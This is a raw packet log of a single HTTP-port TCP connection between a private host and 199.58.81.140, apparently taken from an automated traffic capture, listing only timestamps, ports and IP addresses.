Jan 10, 2024 15:41:30.793708086 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.903309107 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.905777931 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.905831099 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.905858994 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.905900002 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.905956030 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.905998945 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906059027 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906097889 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906147003 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906183004 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906213045 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906301975 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906321049 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906368017 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906405926 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906445980 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906492949 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906528950 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:30.906559944 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:30.906603098 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013118029 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013140917 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013210058 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013215065 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013237953 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013252974 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013293982 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013330936 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013361931 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013400078 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013421059 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013458014 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013489008 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013526917 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013557911 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013612986 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013659954 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013691902 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013704062 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013730049 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013776064 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013816118 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013866901 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013907909 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.013948917 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.013995886 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014048100 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014085054 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014137983 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014183998 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014251947 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014292955 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014311075 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014349937 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014355898 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014391899 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014424086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014461040 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.014470100 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.014509916 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.120573044 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120593071 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120604992 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120620012 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120632887 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120671034 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120697975 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.120702982 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120748997 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.120770931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.120770931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.120807886 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.121053934 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.121097088 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.121798992 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.121994019 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122008085 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122039080 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122054100 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122064114 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122091055 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122103930 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122127056 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122149944 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122765064 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122813940 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122847080 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122859001 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122883081 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122889996 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122925997 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122932911 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.122970104 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.122982025 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123014927 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123260975 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123301983 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123313904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123347998 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123362064 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123402119 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123420000 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123430967 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123465061 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123478889 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123506069 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123547077 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123548031 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123852015 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123889923 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.123975992 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.123990059 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124001980 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124012947 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.124016047 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124028921 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124039888 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124042034 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.124053001 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124066114 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124067068 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.124082088 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.124089003 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.124103069 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.124124050 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228491068 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228552103 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228621960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228662968 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228710890 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228749990 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228755951 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228792906 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228801966 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228852034 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.228867054 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.228931904 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229017019 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229031086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229072094 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229123116 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229176998 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229218960 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229228020 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229263067 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229320049 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229382038 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229420900 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229513884 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229573965 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229588032 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229644060 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229681969 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229698896 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229738951 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229775906 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229805946 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229840040 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.229845047 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229937077 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.229976892 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230016947 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230150938 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230204105 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230206966 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230240107 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230256081 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230312109 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230350018 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230360031 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230424881 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230482101 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230485916 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230519056 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230535030 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230587006 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230623960 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230637074 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230690002 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230727911 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230739117 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230777979 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230797052 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230907917 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.230947018 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.230953932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231038094 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231076956 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231093884 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231129885 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231172085 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231201887 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231237888 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231266975 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231322050 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231359005 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231375933 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231412888 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231424093 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231585026 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231623888 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231642008 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231708050 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231744051 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.231836081 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231956959 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.231997013 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232037067 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232072115 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232131958 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232302904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232345104 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232404947 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232467890 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232506990 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232544899 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232582092 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232621908 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232703924 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232749939 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232801914 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232853889 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232897043 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.232943058 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.232980013 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.233027935 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.233088970 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.233124971 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.233237982 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.233282089 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.233338118 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.233377934 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.236815929 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.236865044 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.236900091 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.236949921 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.236989021 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237019062 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237052917 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237060070 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237104893 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237112999 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237139940 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237186909 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237221956 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237234116 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237267971 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237286091 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237344027 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237420082 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237440109 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237440109 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237457037 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237867117 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.237907887 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.237984896 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.238121986 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.238231897 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342376947 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342392921 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342443943 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342458010 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342470884 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342469931 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342485905 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342499971 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342514038 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342525959 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342539072 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342552900 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342566967 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342619896 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342633963 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342645884 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342660904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342669010 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342678070 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342694044 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342713118 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342762947 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342776060 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342801094 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342813969 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.342947006 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342959881 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.342993975 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343144894 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343158960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343170881 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343194962 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343208075 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343317986 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343333960 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343369007 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343439102 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343487978 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343527079 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343688965 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343744993 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343837023 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343851089 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.343873024 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343888044 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.343904972 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344048023 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344088078 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344296932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344310045 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344322920 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344356060 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344367981 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344418049 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344430923 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344475031 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344602108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344615936 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344640017 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344677925 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.344783068 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344935894 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.344974041 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.345110893 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345125914 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345164061 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.345297098 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345335007 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.345488071 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345577002 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.345643044 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345658064 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.345680952 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.345695972 CET	49756	80	192.168.2.6	199.58.81.140
